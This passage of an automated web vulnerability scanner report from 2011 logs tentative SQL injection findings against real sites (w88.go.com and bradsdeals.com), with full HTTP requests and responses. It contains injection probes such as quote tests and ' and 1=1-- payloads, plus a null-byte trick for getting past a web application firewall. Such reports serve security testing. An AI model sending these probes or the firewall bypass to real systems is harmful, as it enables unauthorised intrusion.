GET /b/ss/wdgabccom,wdgasec%00''/1/H.16/s3647485188674?[AQB]&ndh=1&t=17/8/2011%200%3A58%3A52%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Aindex&g=http%3A//beta.abc.go.com/shows/charlies-angels&r=http%3A//s0.2mdn.net/1249573/CA_300x600.swf&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v16=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&c27=Unknown&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: w88.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B
|
Response 2
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:16:10 GMT
Server: Omniture DC/2.0.0
xserver: www661
Content-Length: 0
Content-Type: text/html
|
1.31. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://w88.go.com |
| Path: |
/b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 |
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /b'/ss/wdgabccom,wdgasec/1/H.16/s39185238005593?[AQB]&ndh=1&t=17/8/2011%200%3A59%3A26%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Abios&g=http%3A//beta.abc.go.com/shows/charlies-angels/bios&r=http%3A//beta.abc.go.com/shows/charlies-angels&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Abios&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Abios&c9=atxt%2Bbios&c12=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Abios&v16=abccom%3Aprimetime%3Acharlies-angels%3Abios&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Abios&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&v24=Alfresco&c27=Unknown&c32=82f4af0d-d106-41a4-aa52-147d8fee51d1&v32=82f4af0d-d106-41a4-aa52-147d8fee51d1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=abccom%3Aprimetime%3Acharlies-angels%3Aindex&pidt=1&oid=http%3A//beta.abc.go.com/shows/charlies-angels/bios&ot=A&[AQE] HTTP/1.1
Host: w88.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; s_sess=%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Aindex%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios%252526ot%25253DA%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240966296%3B
|
Response 1
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:26:47 GMT
Server: Omniture DC/2.0.0
Content-Length: 434
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 was n
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...
|
Request 2
GET /b''/ss/wdgabccom,wdgasec/1/H.16/s39185238005593?[AQB]&ndh=1&t=17/8/2011%200%3A59%3A26%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Abios&g=http%3A//beta.abc.go.com/shows/charlies-angels/bios&r=http%3A//beta.abc.go.com/shows/charlies-angels&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Abios&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Abios&c9=atxt%2Bbios&c12=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Abios&v16=abccom%3Aprimetime%3Acharlies-angels%3Abios&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Abios&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&v24=Alfresco&c27=Unknown&c32=82f4af0d-d106-41a4-aa52-147d8fee51d1&v32=82f4af0d-d106-41a4-aa52-147d8fee51d1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=abccom%3Aprimetime%3Acharlies-angels%3Aindex&pidt=1&oid=http%3A//beta.abc.go.com/shows/charlies-angels/bios&ot=A&[AQE] HTTP/1.1
Host: w88.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; s_sess=%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Aindex%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios%252526ot%25253DA%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240966296%3B
|
Response 2
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:26:47 GMT
Server: Omniture DC/2.0.0
xserver: www600
Content-Length: 0
Content-Type: text/html
|
1.32. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://w88.go.com |
| Path: |
/b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 |
Issue detail
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /b/ss%00'/wdgabccom,wdgasec/1/H.16/s39185238005593?[AQB]&ndh=1&t=17/8/2011%200%3A59%3A26%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Abios&g=http%3A//beta.abc.go.com/shows/charlies-angels/bios&r=http%3A//beta.abc.go.com/shows/charlies-angels&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Abios&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Abios&c9=atxt%2Bbios&c12=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Abios&v16=abccom%3Aprimetime%3Acharlies-angels%3Abios&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Abios&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&v24=Alfresco&c27=Unknown&c32=82f4af0d-d106-41a4-aa52-147d8fee51d1&v32=82f4af0d-d106-41a4-aa52-147d8fee51d1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=abccom%3Aprimetime%3Acharlies-angels%3Aindex&pidt=1&oid=http%3A//beta.abc.go.com/shows/charlies-angels/bios&ot=A&[AQE] HTTP/1.1
Host: w88.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; s_sess=%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Aindex%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios%252526ot%25253DA%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240966296%3B
|
Response 1
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:27:05 GMT
Server: Omniture DC/2.0.0
Content-Length: 392
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...
|
Request 2
GET /b/ss%00''/wdgabccom,wdgasec/1/H.16/s39185238005593?[AQB]&ndh=1&t=17/8/2011%200%3A59%3A26%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Abios&g=http%3A//beta.abc.go.com/shows/charlies-angels/bios&r=http%3A//beta.abc.go.com/shows/charlies-angels&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Abios&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Abios&c9=atxt%2Bbios&c12=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Abios&v16=abccom%3Aprimetime%3Acharlies-angels%3Abios&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Abios&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&v24=Alfresco&c27=Unknown&c32=82f4af0d-d106-41a4-aa52-147d8fee51d1&v32=82f4af0d-d106-41a4-aa52-147d8fee51d1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=abccom%3Aprimetime%3Acharlies-angels%3Aindex&pidt=1&oid=http%3A//beta.abc.go.com/shows/charlies-angels/bios&ot=A&[AQE] HTTP/1.1
Host: w88.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; s_sess=%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Aindex%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios%252526ot%25253DA%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240966296%3B
|
Response 2
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:27:05 GMT
Server: Omniture DC/2.0.0
xserver: www596
Content-Length: 0
Content-Type: text/html
|
1.33. http://www.bradsdeals.com/dealsoftheday/subscribe/b [s parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://www.bradsdeals.com |
| Path: |
/dealsoftheday/subscribe/b |
Issue detail
The s parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the s parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b'%20and%201%3d1--%20&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 1
HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:56 GMT
Connection: close
Content-Length: 1305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
</head>
<body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">D43C-B4C8-D45E-AE50</div>
</div>
</body>
</html>
|
Request 2
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b'%20and%201%3d2--%20&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 2
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:56 GMT
Content-Length: 23948
<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Brad's Deals of the Day</title>
<meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />
<meta name="y_key" content="851f0d788ded642a" />
<meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" />
<meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />
<meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" />
<meta name="y_key" content="7aee1ecd68e082ef" />
<meta name="y_key" content="33d564d1ed93f6ba" />
<meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
<meta name="robots" content="noodp" />
<meta name="robots" content="noydir" />
<meta name="robots" content="noindex, nofollow" />
<link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" />
<meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/>
<link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" />
<!-- RSS -->
<link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" />
<!-- /RSS -->
<!-- CSS -->
<link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
<!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]-->
<!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->
<link rel="s
...[SNIP]...
|
1.34. http://www.bradsdeals.com/dealsoftheday/subscribe/b [tid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://www.bradsdeals.com |
| Path: |
/dealsoftheday/subscribe/b |
Issue detail
The tid parameter appears to be vulnerable to SQL injection attacks. The payloads 13173906%20or%201%3d1--%20 and 13173906%20or%201%3d2--%20 were each submitted in the tid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /dealsoftheday/subscribe/b?tid=30665613173906%20or%201%3d1--%20&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 1
HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:22 GMT
Connection: close
Content-Length: 1305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
</head>
<body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">9559-4CA2-4454-70E1</div>
</div>
</body>
</html>
|
Request 2
GET /dealsoftheday/subscribe/b?tid=30665613173906%20or%201%3d2--%20&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
